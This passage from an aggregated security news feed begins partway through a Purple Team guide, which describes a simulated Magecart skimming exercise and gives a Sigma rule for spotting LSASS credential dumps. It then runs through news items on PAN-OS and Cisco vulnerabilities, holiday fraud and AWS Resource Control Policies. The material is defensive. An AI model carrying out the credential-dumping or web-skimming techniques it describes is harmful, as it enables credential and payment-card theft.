breaches help align Purple Team simulations with the most probable attack scenarios, making the exercise more impactful.Example: Retail Sector — Magecart and Web SkimmingScenario:Retailers are frequently targeted by Magecart groups that execute web skimming attacks (T1185). These attacks involve injecting malicious JavaScript into online checkout pages to steal credit card details.Steps for Purple Team Activity:(1) Breach Analysis:Recent Magecart incidents revealed attackers:Gained initial access through weak admin credentials or misconfigured cloud storage (T1078).Injected malicious code into checkout pages to exfiltrate data (T1185).Used customized obfuscation techniques to evade detection (T1027).(2) Purple Team Activity:Red Team: Simulates web skimming by injecting JavaScript into a test environment’s checkout page. Includes techniques like:Exfiltrating fake credit card data to a remote server.Using obfuscated scripts to mimic real-world tactics.Blue Team: Tests their ability to:Detect unusual web requests and script changes.Respond by isolating affected systems and removing malicious code.( 3)Outcome:New detections implemented (e.g., monitoring JavaScript changes).Hunt model updated to include hypotheses for web injection anomalies.Improved incident response for similar attacks.Observed Attack Trends on own Infrastructure:Analyzing recent attack trends targeting your organization’s infrastructure is one of the most effective ways to determine which TTPs should be prioritized in Purple Team exercises. These trends provide insights into current threats, adversary behaviors, and weaknesses in your environment that need immediate attention.Why Focus on Observed Attack Trends?Contextual Relevance:Attack trends specific to your organization highlight the techniques adversaries are actually using against your systems, making them highly relevant to your defense strategy.Proactive Mitigation:Simulating these observed trends allows your teams to preemptively improve detection, response, and recovery capabilities before an attack succeeds.Data-Driven Prioritization:Leveraging historical data ensures that TTP selection is evidence-based rather than hypothetical or generic, maximizing the value of the Purple Team activity.How to Identify Observed Attack TrendsAnalyze Incident Data:Review logs from SIEMs, EDR tools, and other monitoring systems to extract patterns in recent attacks. For example:Frequency: What attack types or TTPs have been most common?Success Rates: Which attacks bypassed detection or succeeded partially?Phases of Attack: Which MITRE ATT&CK phases have been most targeted?2. Engage Threat Intelligence Feeds:Correlate your internal observations with external threat intelligence to validate whether trends align with known adversary campaigns.3. Review Incident Response Reports:Examine post-incident reviews to identify TTPs that exploited gaps in defenses or overwhelmed detection systems.4. Collaborate Across Teams:Include insights from Red Teams (pen tests or adversary simulations), Blue Teams (monitoring and response), and even SOC analysts to capture a complete picture of recent trends.Tools for Purple Teaming(a) Caldera:Caldera is particularly suited for Purple Teaming because it allows Red and Blue Teams to simulate advanced adversary techniques and test defensive measures in a controlled environment.TTP Simulation (Red Team):Red Teams can simulate attacks based on specific adversary behaviors. Caldera allows the automation of entire attack chains, from initial access to data exfiltration, by selecting relevant TTPs from the MITRE ATT&CK framework.Adversary Profiles:Caldera supports predefined adversary profiles, which represent the tactics, techniques, and procedures used by specific threat groups (e.g., APTs). These profiles map directly to MITRE ATT&CK.Example profiles:APT28: Simulate Russian cyber espionage tactics (e.g., Spearphishing (T1566), Exfiltration (T1041)).APT34: Simulate oil and energy sector attacks (e.g., Exploitation for. Privilege Escalation (T1068)).3. Customizable Attacks:You can also customize attack profiles based on your organization’s needs. Caldera allows the creation of attack chains (series of techniques) or standalone techniques, which can be tailored to simulate specific adversary campaigns.4. Collaborative Simulations:Red Team: Executes adversary emulation scenarios defined within Caldera.Blue Team: Observes the attack and reacts using their existing detection and incident response processes.Both teams can interact in real-time, allowing Blue Teams to test and refine their detection and mitigation processes.Example Use Case: Simulating a Lateral Movement AttackObjective: Simulate a Lateral Movement attack (e.g., T1021 — Remote Services) to test Blue Team’s detection and response.Create or Choose an Adversary Profile:Choose an adversary profile such as APT28 (which often uses Remote Services (T1021) for lateral movement).Define the Attack Scenario:Define the specific techniques within MITRE ATT&CK relevant to lateral movement. For example, Remote Desktop Protocol (T1076), Windows Admin Shares (T1021.002), or SMB/Net Session Hijacking (T1021.001).Automate the Simulation:Use Caldera to automate the lateral movement attack across multiple hosts in your network.Red Team: Executes the attack by moving laterally between systems and trying to escalate privileges.Observe Blue Team’s Response:Blue Team: Monitors network traffic, identifies lateral movement, and attempts to stop the attack using endpoint protection tools, firewalls, and other network defense measures.Evaluate how quickly Blue Team detects the attack and what defensive actions they take.Feedback Loop:After completing the attack scenario, the Purple Team (Red + Blue) debriefs to assess Blue Team’s detection efficacy and response strategies. Based on the gaps identified, Blue Team defenses are enhanced.(b) MITRE ATT&CK Navigator:Visual tool for mapping detection coverage.Example: Use heatmaps to prioritize high-risk TTPs, such as Execution (T1059).( c)Sigma Rules & Elastic Stack:Sigma Rules translate TTPs into detection queries.Example Sigma Rule for detecting Mimikatztitle: Suspicious LSASS Memory Dumplogsource: product: windows service: securitydetection: selection: EventID: 10 TargetImage|contains: ''lsass.exe''level: criticalDeploy in Elastic Stack for real-time monitoring.Additional Free Tools for Purple Teaming1. Atomic Red TeamOverview: Atomic Red Team is an open-source tool designed to test specific MITRE ATT&CK techniques by providing small, atomic (individual) tests. These tests focus on simulating the behavior of adversaries as they execute real-world tactics, techniques, and procedures (TTPs). The tool is designed to allow Red Teams and Blue Teams to validate detection and response capabilities in a controlled environment.How it Works:Test Execution: Atomic Red Team provides a library of predefined tests mapped to specific MITRE ATT&CK techniques. Each test is a standalone action that simulates a specific attack technique, such as running a PowerShell script to execute Command and Scripting Interpreter (T1059).Example: To simulate T1059 (Execution via PowerShell), Atomic Red Team could execute a PowerShell script that triggers a command-line execution, which mimics the behavior of an attacker attempting to execute malicious code remotely.Use Case: This tool is useful for Blue Teams to validate their detection rules or SIEM configurations by observing how specific attack techniques appear in their environment. It allows quick testing of defensive tools (like SIEM or EDR) without the complexity of full attack simulations.2. Prelude OperatorOverview: Prelude Operator is a free, open-source adversary emulation platform that helps organizations operationalize the MITRE ATT&CK framework. It allows you to execute complex, multi-step attack scenarios designed to emulate advanced persistent threats (APTs) and test your security posture.How it Works:Multi-Step Scenarios: Unlike single techniques in Atomic Red Team, Prelude Operator enables you to execute more complex attack chains. For example, you can simulate a complete phishing campaign that includes Initial Access (T1071), Credential Dumping (T1003), and Lateral Movement (T1021) in one scenario.GUI Interface: The platform provides a graphical user interface (GUI), making it easier to set up, configure, and run adversary emulation scenarios. This is especially helpful for Blue Teams that need to observe the entire attack lifecycle and improve detection capabilities across multiple phases of an attack.Use Case: Prelude Operator allows for repeatable, customizable adversary emulation tests, where you can tailor attack simulations to your organization’s specific needs, targeting multiple phases of an adversary’s attack lifecycle.3. DetectionLabOverview: DetectionLab is a virtualized environment designed to test and enhance detection capabilities in a safe, isolated setup. It comes preconfigured with a variety of Security Information and Event Management (SIEM) tools and Endpoint Detection and Response (EDR) solutions, allowing teams to simulate attacks and assess the performance of their detection systems.How it Works:Preconfigured Setup: DetectionLab provides a complete, ready-to-use virtual environment. It includes a SIEM system (like Elastic Stack or Splunk) and an EDR tool (like OSQuery or Carbon Black), which makes it easy for Blue Teams to simulate attacks and observe how their detection tools respond.Environment Simulation: You can deploy and execute a variety of attack scenarios within the environment, including those mapped to MITRE ATT&CK. This helps teams validate whether their SIEM or EDR tools can detect attacks like Privilege Escalation (T1068) or Exfiltration (T1041).Use Case: DetectionLab is ideal for Blue Teams looking to enhance their ability to detect advanced persistent threats and validate their detection systems in a low-risk, isolated setup. It helps with the hands-on testing of detection rules and tuning them based on real-world attack simulations.Summary of BenefitsAtomic Red Team: Provides quick, focused tests of individual MITRE ATT&CK techniques, helping teams validate specific detection rules.Prelude Operator: Facilitates operational adversary emulation with multi-step attack scenarios, ideal for testing end-to-end security measures and improving detection across the full attack lifecycle.DetectionLab: Offers a preconfigured, isolated environment for testing and enhancing detection capabilities, providing a risk-free space for Blue Teams to fine-tune SIEM and EDR tools.These tools, when used together, enable both Red and Blue Teams to simulate, detect, and improve defenses against real-world threats in a collaborative and structured manner.Challenges and RecommendationsChallenge: Ensuring Alignment Between Teams Solution: Use collaboration platforms like Slack or MSTeams for real-time updates. Schedule regular meetings to discuss findings and plans.Challenge: Resource Constraints Solution: Leverage open-source tools like Caldera and Atomic Red Team to reduce costs.Challenge: Measuring Effectiveness Solution: Track KPIs, such as:Time to detect simulated attacks.Number of TTPs successfully mitigated.ConclusionPurple team activities are indispensable for building robust cyber defenses. By leveraging tools like Attackgen, Caldera, MITRE Navigator, and Sigma Rules, organizations can bridge gaps between detection and response capabilities. A systematic approach to TTP selection ensures relevance and effectiveness, while free tools and structured frameworks lower barriers to entry.Purple Team Activities: Where Offense Meets Defense to Strengthen Cyber Resilience was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

A zero-day vulnerability affecting five discontinued GeoVision product models has been exploited by a botnet. The post Discontinued GeoVision Products Targeted in Botnet Attacks via Zero-Day appeared first on SecurityWeek.

by SecurityWeek

Palo Alto Networks confirmed two zero-day vulnerabilities were exploited as part of attacks in the wild against PAN-OS devices, with one being attributed to Operation Lunar Peek.BackgroundOn November 18, Palo Alto Networks updated its advisory (PAN-SA-2024-0015) for a critical flaw in its PAN-OS software to include a CVE identifier:CVEDescriptionCVSSCVE-2024-0012PAN-OS Authentication Bypass Vulnerability9.3In addition to CVE-2024-0012, Palo Alto Networks assigned a second CVE for a privilege escalation vulnerability (CVE-2024-9474).CVEDescriptionCVSSCVE-2024-9474PAN-OS Privilege Escalation Vulnerability6.9AnalysisCVE-2024-0012 is an authentication bypass vulnerability in the management web interface of PAN-OS devices. An unauthenticated, remote attacker could exploit this vulnerability to obtain administrator privileges on the vulnerable PAN-OS device, enabling follow-on activity including modifying device configuration, accessing other administrative functions as well as exploiting other vulnerabilities, such as CVE-2024-9474.CVE-2024-9474 is a privilege escalation vulnerability in the web management interface of PAN-OS devices. An authenticated, remote attacker could exploit this vulnerability to gain root privileges on the firewall.While not explicitly referenced in its advisory, based on the description, it is believed that CVE-2024-0012 and CVE-2024-9474 may have been used as part of an exploit chain.Attributed to Operation Lunar PeekIn a threat brief about the vulnerabilities, Palo Alto Networks’ Unit 42 have attributed the exploitation of CVE-2024-0012 to a campaign they call Operation Lunar Peek. As of November 18, no specific details have yet to be shared about Operation Lunar Peek or attribution to a specific threat actor or country of origin.While Unit 42 did not explicitly connect CVE-2024-9474 to this operation, they reference this flaw as part of follow-on activity and have stated they’ve “observed threat activity that exploits this vulnerability against a limited number of management web interfaces.”Initial advisory published on November 8PAN-SA-2024-0015 was first published on November 8, following reports of a zero-day vulnerability affecting the management interfaces of PAN-OS devices. Reports indicate that someone was selling access to a zero-day in PAN-OS. It wasn’t until November 14 that Palo Alto Networks confirmed “threat activity” associated with this zero-day.Proof of conceptAt the time this blog post was published, there was no proof-of-concept (PoC) available for this vulnerability.SolutionThe following table contains a list of affected and fixed versions of PAN-OS:ProductCVE-2024-0012CVE-2024-9474Fixed VersionPAN-OS 10.1Not Affected10.1.14-h4 and below10.1.14-h6 and abovePAN-OS 10.210.2.12-h1 and below10.2.12-h1 and below10.2.12-h2 and abovePAN-OS 11.011.0.5-h2 and below11.0.5-h2 and below11.0.6-h1 and abovePAN-OS 11.111.1.4-h7 and below11.1.4-h7 and below11.1.5-h1 and abovePAN-OS 11.211.2.3-h3 and below11.2.3-h3 and below11.2.4-h1 and aboveCloud NGFWNot AffectedNot Affected-Prsima AccessNot AffectedNot Affected-Equally as important as applying patches, organizations that utilize PAN-OS devices should secure the management web interface to prevent external access, opting instead to limit access to trusted internal IP addresses. For more information, please refer to Palo Alto’s guide, Tips & Tricks: How to Secure the Management Access of Your Palo Alto Networks Device.Identifying affected systemsA list of Tenable plugins for this vulnerability can be found on the individual CVE pages for CVE-2024-0012 and CVE-2024-9474 as they’re released. These links will display all available plugins for these vulnerabilities, including upcoming plugins in our Plugins Pipeline.Get more informationThreat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012PAN-SA-2024-0015: CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web InterfaceCVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management InterfaceJoin Tenable''s Security Response Team on the Tenable Community.Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.

by Tenable

Another day, another hack at T-Mobile! This time, Chinese state-sponsored group Salt Typhoon hacked T-Mobile, targeting US telecoms…

by Hackread

​Broadcom warned today that attackers are now exploiting two VMware vCenter Server vulnerabilities, one of which is a critical remote code execution flaw. [...]

by BleepingComputer

Maxar has 2,600 employees — with more than half having security clearances to work on classified U.S. government projects. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Great Plains Regional Medical Center says the personal information of 133,000 individuals was compromised in a ransomware attack. The post Ransomware Attack on Oklahoma Medical Center Impacts 133,000 appeared first on SecurityWeek.

by SecurityWeek

The voluntary recommendations from the Department of Homeland Security cover how artificial intelligence should be used in the power grid, water system, air travel network, healthcare, and other pieces of critical infrastructure.

by Dark Reading

EPA flags security vulnerabilities in more than 300 drinking water systems that serve roughly 110 million individuals. The post 300 Drinking Water Systems in US Exposed to Disruptive, Damaging Hacker Attacks appeared first on SecurityWeek.

by SecurityWeek

Palo Alto Networks has released IoCs for the attacks exploiting a newly uncovered firewall zero-day vulnerability. The post Palo Alto Networks Releases IoCs for New Firewall Zero-Day appeared first on SecurityWeek.

by SecurityWeek

We tested the best password managers for Mac right now, to help you keep your laptop logins secure. These are our favorites.

by ZDNET Security

AWS has released an important new feature that allows you to apply permission boundaries around resources at scale called Resource Control Policies (RCPs). Read on to learn what RCPs are all about and how to use them, as well as how Tenable Cloud Security already factors them into its analysis.AWS just launched Resource Control Policies (RCPs), a new feature in AWS Organizations that lets you restrict the permissions granted to resources. If you are familiar with service control policies (or SCPs), you may have an idea of what an RCP can do and what it’s good for. We thought “unboxing” RCPs would be beneficial both for those of you seasoned in using guardrails as well as for novices. So after taking this shiny new feature out for a spin, here’s what we have to say about it. What are RCPs? Before we can explain RCPs, we need to cover the concept of guardrails and “data perimeters.” Where AWS really shines in its IAM features is in the multiple mechanisms it provides for managing entitlements to resources in AWS accounts. As practitioners who have been pioneers in helping organizations achieve least privilege and manage access in the most effective way possible, we at Tenable Cloud Security have a lot of appreciation for these features.Access guardrails are a significant component of the arsenal of tools AWS provides its customers to properly control access to resources. They are robust and highly configurable controls that can be placed on accounts, resources and/or identities to limit the potential sum of permissions they can be assigned. Access-guardrail functions act as a boundary, so even when someone tries to assign unauthorized permissions to an entity – whether the attempt is accidental or malicious -- the access won’t be granted. A guardrail could be, for example, a “permission boundary” placed on a specific principal, such as an IAM role or IAM user, to limit the potential permissions the principal can have. Or it can be, for example, a resource-based policy applied to a specific resource to limit the principals that can access the resource, the access conditions, the actions that can be performed, and so on. If you wanted to impose such a boundary at scale to all identities in an account or even in several accounts, you could do it using an SCP applied from AWS Organizations. SCPs are known as very effective boundaries, although they don’t solve the issue of resource-based policies that grant access to principals from external accounts (more on that later). This kind of boundary may also be known as a “data perimeter.” Several such boundary types exist. We’re going to touch on just a few so if you’re interested in getting more details, we recommend reading this article by AWS which reviews the different ways to create these data perimeters.Simply put, the newly introduced RCPs are a boundary applied to all resources (of the supported resource types) in an account or accounts. As you can use an SCP to apply a boundary at scale to all principals in an account, instead of to each principal separately using a permission boundary, you can use an RCP to apply a boundary to all resources of an account, instead of to each resource separately using its resource-based policy.From AWS Organizations, you can create and apply RCPs similarly to how you would an SCP; you can find RCPs under “Policies” in AWS Organizations:  Location of RCPs under “Policies” in AWS Organizations  The management interface of RCPs has the same “look and feel” as that of SCPs:  Console management of RCPs, exactly the same as for SCPs  If you listen closely you may be able to hear slide decks about AWS IAM changing around the world, as the widely known policy evaluation logic diagram for AWS access has now been changed to include the RCP:  The new AWS policy evaluation logic diagram, now including RCPs (Source: AWS Documentation)  Why are RCPs important? As mentioned earlier, SCPs have a well-known limitation: while very effective as a boundary, SCPs ironically don’t solve the issue of resource-based policies that grant access to principals from external accounts. That is, if the resource-based policy applied to a resource grants direct access to a principal from a different account, the SCP will not limit that access. This isn’t intuitive to understand, so many people may not realize this. Granted, the best practice is to provide such access with an IAM role to be assumed by the principal in the external account, and that IAM role will in turn be granted the permissions required by that principal. However, best practices are often not implemented. Access granted by a resource-based policy is an issue security professionals can’t ignore. So, RCPs allow you to apply such a boundary at scale, which is great. Until now, doing so was not an option. An added bonus: Having a separate instrument for applying this boundary to resources may improve practitioner awareness that SCPs are a boundary for identities in the account and do not limit external access - that’s the job of the resource oriented control, RCP. But it’s important to also remember that these boundaries are not just around permissions. You can also use RCPs to enforce conditions on access to resources, which we will detail in the next section. One last thing: When exploring RCPs, don’t stop using SCPs. They’re highly effective as a boundary and serve their intended purpose: applying a boundary for what identities in the account can perform in the account and outside of it -- meaning on other accounts as well. An RCP doesn’t do this. In short, SCPs and RCPs have different use cases, so keep that in mind. Usage So how do we use this boundary goodness? Let’s look at a few examples, and at several important points about RCPs. Creating data perimeter for a resource As mentioned, when it comes to scale, RCPs take the creation of a “perimeter” around resources to the next level. The good news is that all global condition keys, as well as the condition keys of the services that RCPs support, are available in RCPs. This is pretty cool as it allows you to really hit the ground running with RCPs. For example, if we use attribute-based access control (ABAC) to manage access to a resource, we can limit all access to principals labeled “Dev” to sensitive S3 resources based on their name pattern using an RCP, which will look like this: { ""Version"": ""2012-10-17"", ""Statement"": [ { ""Effect"": ""Deny"", ""Principal"": ""*"", ""Action"": ""s3:*"", ""Resource"": ""arn:aws:s3:::testing-rcp-pattern-sensitive-bucket-*"", ""Condition"": { ""StringEquals"": { ""aws:PrincipalTag/Department"": ""Dev"" } } } ] }Unfortunately, “NotAction” is not supported. It would have been great to be able to deny any other action besides very specific ones which would be allowed as exempt. Hopefully, it will be supported some day. In addition to setting the boundary for principals, you can also enforce that access has to be done from specific VPCs or IPs, as such: { ""Version"": ""2012-10-17"", ""Statement"": [ { ""Sid"": ""Statement1"", ""Effect"": ""Deny"", ""Principal"": ""*"", ""Action"": ""s3:*"", ""Resource"":""*"", ""Condition"": { ""NotIpAddress"": { ""aws:SourceIp"": ""<IP_ADDRESS>"" } } } ] }Enforce action-related policy In addition to enforcing access to be done – or not be done – by certain principals or from certain locations, you can also use RCPs to enforce how the access will be granted. RCP functions as a kind of policy as code. For example, you can enforce that access to S3 buckets will only be done over TLS, as such: { ""Version"": ""2012-10-17"", ""Statement"": [ { ""Effect"": ""Deny"", ""Principal"": ""*"", ""Action"": ""s3:*"", ""Resource"": ""*"", ""Condition"": { ""Bool"": { ""aws:SecureTransport"": ""false"" } } } ] }Or, you can enforce the default SSE server-side encryption on items uploaded to S3 buckets, like this: { ""Version"": ""2012-10-17"", ""Statement"": [ { ""Effect"": ""Deny"", ""Principal"": ""*"", ""Action"": ""s3:PutObject"", ""Resource"": ""*"", ""Condition"": { ""StringNotEquals"": { ""s3:x-amz-server-side-encryption"": ""AES256"" } } } ] }Pretty cool, isn’t it? Don''t cause denial-of-service Be mindful to avoid creating your own denial of service (DoS) on your infrastructure by denying legitimate access by mission-critical services, employees or customers. When controls are used incorrectly, this can happen. Here’s an obvious tip: Always test in lower environments (development, testing, staging) every control you’ll apply to production. That said, keep these things in mind to ease RCPs’ safe adoption : The “NotResource” element is supported. You can use it to exclude resources to which the RCPs won’t apply. The “NotPrincipal” element is not supported. You must specify “*” as the “Principal.” This isn’t problematic because you can apply the appropriate logic around principals by using condition keys such as “aws:PrincipalArn” and “aws:PrincipalAccount”. Third-party services that perform various business functions such as security (like Tenable Cloud Security), DevOps and FinOps on your cloud environment might be blocked by RCPs.You may have to exclude them from those RCPs if you want them to operate properly. Finally, since AWS service principals may also be restricted by RCPs, you should use appropriate condition keys (such as aws:PrincipalIsAWSService and aws:PrincipalServiceName) to exclude the relevant ones, as you would in a resource-based policy. (We’ve written about this issue in another blog post). Services supported It’s key to keep in mind that RCPs only support a handful of services:Amazon S3AWS Security Token Service (STS)Amazon SQSAWS KMS AWS Secrets ManagerThis is a good start, of course, because SQS, S3 and Secrets Manager usually host sensitive and mission-critical resources, while STS is crucial for creating a boundary around assuming IAM roles. As mentioned, limiting IAM role assumption is important for preventing external identities from gaining access to resources within an account. And of course, KMS is a sensitive service. Protecting KMS keys with a boundary, for example, for setting the key policy is an amazing use case for RCPs. Quotas Similarly to SCPs, there’s a quota for five RCPs per Organizational Unit (OU). You can apply five of each. Also, similarly to SCPs, there’s a 5,120 character limit per policy, and you can create and store up to 1,000 RCPs in an organization.Factoring it in to your cloud security Tenable Cloud Security is a pioneer in the domain of cloud infrastructure entitlements management (CIEM), and we consider it an invaluable component of our cloud native application protection platform (CNAPP) solution. Being precise in what identities have access to is crucial to understanding the security risk that identities pose and are exposed to. For this reason, and as a close partner of AWS, we’ve already integrated the new RCP logic to our analysis of the permissions granted to identities. For example, below you see an IAM user granted access to many buckets in an external account by, most likely, a mistaken resource-based policy applied at scale. Here’s how it looks without an RCP applied: IAM user with overprivileged access to multiple buckets – far more access than to the specific bucket needed – without an RCP in place And here is how it looks with the RCP applied: The RCP limits access to the buckets based on their name pattern:  With RCP in place, an IAM user who had overprivileged access to multiple buckets, now has access to just one specific bucket, which is still overprivileged, but due to the kind of actions available. Spot the difference? The second finding factors in the RCP and only alerts about excessive permissions granted on the specific bucket, where some actions are needed. This becomes clearer as we see the recommendation for a least-privilege policy generated by Tenable Cloud Security showing exactly which actions the identity requires with regard to this resource:  Least privilege policy recommendation based on actual activity performed by the identity  You can now focus on reducing this specific overpermissiveness not controlled by the RCP. Conclusion First of all, kudos to AWS for delivering on this feature. There are many potential benefits from using RCPs to apply resource-based boundaries at scale. While there’s plenty of room for RCPs to grow to support more features and services, we believe organizations should start to employ this control as part of their IAM strategy right away. Simplify AWS cloud security with protection for hybrid and multi-cloud and visit us at AWS re:Invent in Las Vegas next month at booth #520! 

by Tenable

Organizations keen to fund gen AI-powered software development for the anticipated benefits should also understand that this may come with adverse effects.

by ZDNET Security

As Black Friday approaches, shoppers eagerly anticipate major discounts and deals, hoping to snag a bargain. However, the surge in online shopping comes with a darker side: an increase in fraud and cyberattacks. The UK’s National Cyber Security Centre (NCSC) has issued a warning on the rise of hackers on Black Friday, which is increasingly being dubbed “Black Fraud Day.” According to recent data from Action Fraud, UK consumers lost over £11.5 million to online scams during the holiday period last year, with the vast majority of these incidents linked to fraudulent purchases made during Black Friday and Cyber Monday. This represents an alarming increase of nearly £1 million compared to the previous year. The statistics underline the growing sophistication of scammers, including Black Friday hackers who are exploiting online shopping platforms to target unsuspecting shoppers.  Cybersecurity experts have highlighted how fraudsters are using advanced techniques, including artificial intelligence (AI), to craft highly convincing scams. These AI-driven attacks can be difficult to detect, making it even more crucial for shoppers to be vigilant during the Black Friday sale. Fraudsters may use fake websites, social media ads, or phishing emails to lure victims into entering sensitive personal and financial information.  The Role of Hackers on Black Friday  With so much of the population shopping online for Black Friday deals, it’s no surprise that hackers are eager to capitalize on this lucrative time. A key tactic used by cybercriminals is to create a false sense of urgency, enticing shoppers with limited-time offers or extremely low prices. This strategy plays on consumers'' fear of missing out, driving them to make quick, unwise decisions that put them at risk of fraud.  The NCSC''s Richard Horne emphasized that cyber criminals often target the eagerness of consumers during the Black Friday rush, utilizing both traditional methods and more sophisticated AI-driven attacks to catch people off guard. “Unfortunately, this is also prime time for cyber criminals, who exploit bargain hunters with increasingly sophisticated scams,” Horne stated.  In addition to phishing scams, Black Friday hackers often take advantage of unsecured websites and online marketplaces to carry out their attacks. Whether it''s a fake listing on a social media platform or a malicious link sent via email, these attacks can leave shoppers vulnerable to identity theft, financial loss, or worse.  Tips to Stay Safe During the Black Friday Sale  To help shoppers avoid falling victim to Black Friday cyberattacks, the NCSC and Action Fraud have provided a set of practical tips. First and foremost, experts recommend enabling two-factor authentication (2FA) on all important online accounts. This added layer of security can help prevent unauthorized access, even if a hacker has obtained your password.  Another crucial piece of advice is to avoid clicking on links or offers from unverified sources. Scammers often use social media platforms and messaging apps to promote deals that seem too good to be true. Before making a purchase, always take the time to research the company or seller, checking reviews on trusted websites and ensuring that their website is secure (look for “https” in the URL).  Fraud Minister Lord Hanson also weighed in on the importance of vigilance, urging shoppers to trust their instincts. “If something doesn’t feel right, stop what you’re doing, break contact, and do not click any links,” he advised.  Avoiding the Pitfalls of Social Media and Online Marketplaces  Online marketplaces and social media platforms have become a significant source of fraudulent activity during the Black Friday sale. In fact, 43% of fraud reports last year mentioned social media platforms, and nearly 19% of cases were linked to online marketplaces. Shoppers should be especially cautious when making purchases through these channels.  Adam Mercer, Deputy Head of Action Fraud, cautioned consumers to avoid feeling pressured into making impulsive purchases. “A false sense of urgency is a tell-tale sign of a fraudster,” he said. If something seems too good to be true, it probably is. Mercer also recommended using credit cards instead of bank transfers for online purchases, as credit cards typically offer fraud protection. 

by The Cyber Express

Five tips to enhance your cybersecurity.

by Kaspersky

AI is changing the way code is generated so developers can gain more speed advantages. Embedded capabilities in IDEs and low-code platforms help.

by ITPro Today

The DeepData malware framework was seen exploiting a Fortinet VPN client for Windows zero-day that remains unpatched. The post Fortinet VPN Zero-Day Exploited in Malware Attacks Remains Unpatched: Report appeared first on SecurityWeek.

by SecurityWeek

Fake Bitwarden password manager advertisements on Facebook are pushing a malicious Google Chrome extension that collects and steals sensitive user data from the browser. [...]

by BleepingComputer

Proton VPN is our pick for the best free VPN. Here''s why, based on our testing.

by ZDNET Security

The inventor of the World Wide Web is on a laudable mission to give everyone control of their online data. He''s fighting an uphill battle.

by ITPro Today

Mozilla’s 0Din uncovers critical flaws in ChatGPT’s sandbox, allowing Python code execution and access to internal configurations. OpenAI…

by Hackread

AnnieMac Home Mortgage is informing over 171,000 individuals that their data has been compromised in a hacker attack.  The post AnnieMac Data Breach Impacts 171,000 People appeared first on SecurityWeek.

by SecurityWeek

Overview The Indian Computer Emergency Response Team (CERT-In) has recently added two Cisco vulnerabilities to its catalog. Both vulnerabilities target Cisco products, with high severity ratings and potential for impacts on the confidentiality, integrity, and availability of affected systems.  The first vulnerability, CVE-2024-20536, affects Cisco’s Nexus Dashboard Fabric Controller (NDFC), specifically versions 12.1.2 and 12.1.3. The flaw is found in the REST API endpoint and web-based management interface, and it could allow an authenticated, remote attacker with read-only privileges to execute arbitrary SQL commands on an affected device. The vulnerability arises due to insufficient input validation. An attacker with read-only privileges could exploit this flaw by sending specially crafted requests to the affected device''s REST API or management interface, bypassing input validation and potentially modifying or deleting data in the internal database. Exploiting this vulnerability could lead to denial of service (DoS) conditions and a significant disruption of operations. The severity of the vulnerability is classified as high. It affects Cisco NDFC versions 12.1.2 and 12.1.3, making these systems particularly vulnerable to exploitation. The potential impact includes data manipulation, which could allow attackers to alter sensitive information and service disruption, potentially leading to system downtime. Furthermore, there is a risk of data leakage, where unauthorized individuals may access and expose confidential data stored within the affected systems. This vulnerability does not affect Cisco NDFC when it is configured as a Storage Area Network (SAN) controller. However, for organizations using the affected versions of Cisco NDFC, the potential risks are significant, especially in terms of data integrity and availability. CVE-2024-20484: Denial of Service in Cisco Enterprise Chat and Email (ECE) The second vulnerability, CVE-2024-20484, affects Cisco Enterprise Chat and Email (ECE) versions 12.6 and earlier, running the External Agent Assignment Service (EAAS). This vulnerability could allow unauthenticated, remote attackers to trigger a Denial of Service (DoS) condition, disrupting the availability of the ECE system. The vulnerability lies in the way Cisco ECE handles Media Routing Peripheral Interface Manager (MR PIM) traffic. An attacker could exploit this flaw by sending specially crafted MR PIM traffic, causing a failure in the MR PIM connection between Cisco ECE and Cisco Unified Contact Centre Enterprise (CCE). This failure leads to a denial-of-service condition, rendering the ECE system inoperable. This issue primarily affects organizations using Cisco ECE for enterprise communication. A successful attack could lead to widespread disruptions, affecting internal communications and customer service operations. Cisco’s Broader Vulnerability Landscape: A Year of Increased Threats While CVE-2024-20484 and CVE-2024-20536 are the latest additions to the catalog of known vulnerabilities, Cisco has had a series of high-severity vulnerabilities throughout the year. In addition to these new vulnerabilities, Cyble recently reported on a critical flaw in the Unified Industrial Wireless Software for Ultra-Reliable Wireless Backhaul (URWB), tracked as CVE-2024-20418. This vulnerability, with a CVSS score of 10.0 (the highest possible severity), allows attackers to gain root-level access to vulnerable Cisco devices. Exploiting this flaw can enable unauthorized command execution on affected systems, making it one of the most dangerous vulnerabilities in Cisco''s product lineup this year. The CVE-2024-20418 vulnerability affects Cisco Catalyst Access Points operating in URWB mode, such as the Catalyst IW9165D, IW9165E, and IW9167E models. Attackers can exploit this flaw by sending specially crafted HTTP requests to the affected device, injecting commands with root privileges, and gaining control over the device. Exploiting this vulnerability could lead to compromises in industrial and high-stakes environments. Moreover, Cyble sensors have previously detected cyberattacks targeting the “/+CSCOE+/logon.html” URL, which is linked to Cisco ASA''s WebVPN Login Page. Vulnerabilities like XSS, path traversal, and HTTP response splitting could allow attackers to execute code, steal data, or disrupt services. Conclusion  The disclosure of these Cisco vulnerabilities, like CVE-2024-20484 and CVE-2024-20536, stresses the growing risk of exploitation in critical infrastructure, particularly in widely used systems like Cisco products. As Cyble and other threat intelligence firms have noted, cybercriminals are increasingly targeting known vulnerabilities, employing tactics such as brute-force attacks and leveraging the dark web to spread exploits.  With vulnerabilities continuing to be discovered and actively targeted, organizations must prioritize patch management, implement strong security measures, and conduct regular vulnerability assessments. By staying on guard and proactive in updating systems, segmenting networks, and monitoring suspicious activity, businesses can better defend against online threats.  The post CERT-In Flags Two High-Risk Cisco Vulnerabilities Targeting Key Infrastructure appeared first on Cyble.

by CYBLE

For the latest discoveries in cyber research for the week of 11th November, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES The FBI and CISA issued a joint statement detailing a major Chinese cyber-espionage campaign targeting U.S. telecommunications infrastructure, led by the APT group Salt Typhoon. This operation compromised networks to steal call […] The post 18th November – Threat Intelligence Report appeared first on Check Point Research.

by Check Point Research

Legal documents released as part of an ongoing legal tussle between Meta''s WhatsApp and NSO Group have revealed that the Israeli spyware vendor used multiple exploits targeting the messaging app to deliver Pegasus, including one even after it was sued by Meta for doing so. They also show that NSO Group repeatedly found ways to install the invasive surveillance tool on the target''s devices as

by The Hacker News

